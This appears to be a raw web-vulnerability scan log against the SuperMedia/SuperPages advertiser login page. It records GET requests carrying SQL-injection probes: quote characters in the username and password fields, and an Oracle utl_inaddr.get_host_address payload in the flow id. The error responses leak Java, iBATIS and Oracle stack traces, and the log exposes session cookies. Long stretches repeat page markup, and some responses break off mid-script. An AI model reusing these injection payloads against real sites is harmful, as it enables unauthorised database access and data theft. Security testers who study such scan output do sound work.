<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>



















<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow";s.pageName="";s.prop1="Account Setup Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Exception thrown executing [AnnotatedAction@41890a55 targetAction = com.idearc.ssa.web.spring.LoginActAction@4a943bb9, attributes = map['method' -> 'setupForm']] in state 'enterCriteria' of flow 'loginact-flow' -- action execution attributes were 'map['method' -> 'setupForm']'; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8";s.prop8="";s.prop9="";s.prop10="2FF790FDB315C80023FC621E3266E6C1.app7-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
No such flow definition with id &#039;&#039;||(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))||&#039;&#039; found; the flows available are: array&lt;String&gt;[&#039;accountAdmin-flow&#039;, &#039;accountreg-flow&#039;, &#039;businessprofile-flow&#039;, &#039;client-consolidation-flow&#039;, &#039;contactus-flow&#039;, &#039;coupon-flow&#039;, &#039;forgotpassword-edit-flow&#039;, &#039;funding-flow&#039;, &#039;lead-maintain-flow&#039;, &#039;listingOrderSummary-flow&#039;, &#039;login-flow&#039;, &#039;loginact-flow&#039;, &#039;maintaincreditcard-flow&#039;, &#039;microsite-flow&#039;, &#039;myaccount-contactinfo-edit-flow&#039;, &#039;myaccount-domains-flow&#039;, &#039;myaccount-email-edit-flow&#039;, &#039;myaccount-emails-flow&#039;, &#039;myaccount-flow&#039;, &#039;myaccount-password-edit-flow&#039;, &#039;myaccount-websites-flow&#039;, &#039;onlinecc-flow&#039;, &#039;ordersummary-flow&#039;, &#039;paypercall-flow&#039;, &#039;pfc-businessprofile-flow&#039;, &#039;pfc-flow&#039;, &#039;pfp-adDesign-flow&#039;, &#039;pfp-categories-flow&#039;, &#039;pfp-elp-flow&#039;, &#039;pfp-geo-flow&#039;, &#039;pfp-keywords-flow&#039;, &#039;photos-flow&#039;, &#039;ppc-advsearch-flow&#039;, &#039;ppc-bidding-flow&#039;, &#039;ppc-create-flow&#039;, &#039;ppc-fullservice-flow&#039;, &#039;ppc-maintain-flow&#039;, &#039;repmanagement-flow&#039;, &#039;reviews-flow&#039;, &#039;sclicks-maintain-flow&#039;, &#039;sharethewealth-flow&#039;, &#039;temporary-password-flow&#039;, &#039;webhosting-addons-flow&#039;, &#039;webhosting-design-flow&#039;, &#039;webhosting-domainnames-flow&#039;, &#039;webhosting-email-products-flow&#039;, &#039;webhosting-websites-flow&#039;]
</div>

</div>
</div>
<div >























<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).h..
- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=%2527&password=3&=3&_flo..

Parameters

Parameter Type Value
fromPage GET index
username GET %27
password GET 3
GET 3
_flowId GET loginact-flow

Request

GET /spportal/spportalFlow.do?fromPage=index&username=%2527&password=3&=3&_flowId=loginact-flow HTTP/1.1
Referer: https://www.supermedia.com/spportal/indexLogin.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=2FF790FDB315C80023FC621E3266E6C1.app7-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; trafficSource=default; CstrStatus=RVU
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:59:22 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6062






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>



















<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/indexLogin.do";s.pageName="";s.prop1="";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="";s.prop7="";s.prop8="";s.prop9="";s.prop10="";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
Exception thrown executing [AnnotatedAction@41890a55 targetAction = com.idearc.ssa.web.spring.LoginActAction@4a943bb9, attributes = map[&#039;method&#039; -&gt; &#039;setupForm&#039;]] in state &#039;enterCriteria&#039; of flow &#039;loginact-flow&#039; -- action execution attributes were &#039;map[&#039;method&#039; -&gt; &#039;setupForm&#039;]&#039;; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT_FFI&#034;, line 40ORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT&#034;, line 138ORA-06512: at &#034;PSMGR.DECRYPT_FUNCTION&#034;, line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT_FFI&#034;, line 40ORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT&#034;, line 138ORA-06512: at &#034;PSMGR.DECRYPT_FUNCTION&#034;, line 8
</div>

</div>
</div>
<div >























<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer();
});
}
});
$("#dropDownHolder a").mouseover(function(){
clearDropDownTimer();
});
$("#dropDownHolder").mouseout(function(){
clearDropDownTimer();
setDropDownTimer();
});
$("#dropDownHolder").mouseover(function(){
clearDropDownTimer();
});
});
</script>
<!-- DROP DOWN END -->
<div id="footer" >




<div id="sitemap">

<div class="block first">


<h4>Company:</h4>
<ul>
<li><a href="https://www.supermedia.com/about-us" title="About Us">About Us</a></li>
<li><a href="https://www.supermedia.com/press" title="Press">Press</a></li>
<li><a href="http://ir.supermedia.com" title="Investors">Investors</a></li>
<li><a href="https://www.supermedia.com/careers" title="Careers">Careers</a></li>
<li><a href="https://www.supermedia.com/social-responsibility" title="Social Responsibility">Social Responsibility</a></li>
<li><a href="http://my.supermedia.com/directoryoptout" title="Directory Opt-out">Directory Opt-out</a></li>
</ul>



<h4>Client Solutions:</h4>
<ul>
<li><a href="https://www.supermedia.com/client-solutions/client-stories" title="Client Stories">Client Stories</a></li>
<li><a href="https://www.supermedia.com/client-solutions/local-service" title="Local Services">Local Services</a></li>
..
- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=..

Parameters

Parameter Type Value
fromPage GET index
username GET Ronald Smith
password GET %27
GET 3
_flowId GET loginact-flow

Request

GET /spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=%2527&=3&_flowId=loginact-flow HTTP/1.1
Referer: https://www.supermedia.com/spportal/indexLogin.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=2FF790FDB315C80023FC621E3266E6C1.app7-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; trafficSource=default; CstrStatus=RVU
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:59:37 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6186






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>



















<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Exception thrown executing [AnnotatedAction@41890a55 targetAction = com.idearc.ssa.web.spring.LoginActAction@4a943bb9, attributes = map['method' -> 'setupForm']] in state 'enterCriteria' of flow 'loginact-flow' -- action execution attributes were 'map['method' -> 'setupForm']'; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8";s.prop8="";s.prop9="";s.prop10="2FF790FDB315C80023FC621E3266E6C1.app7-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
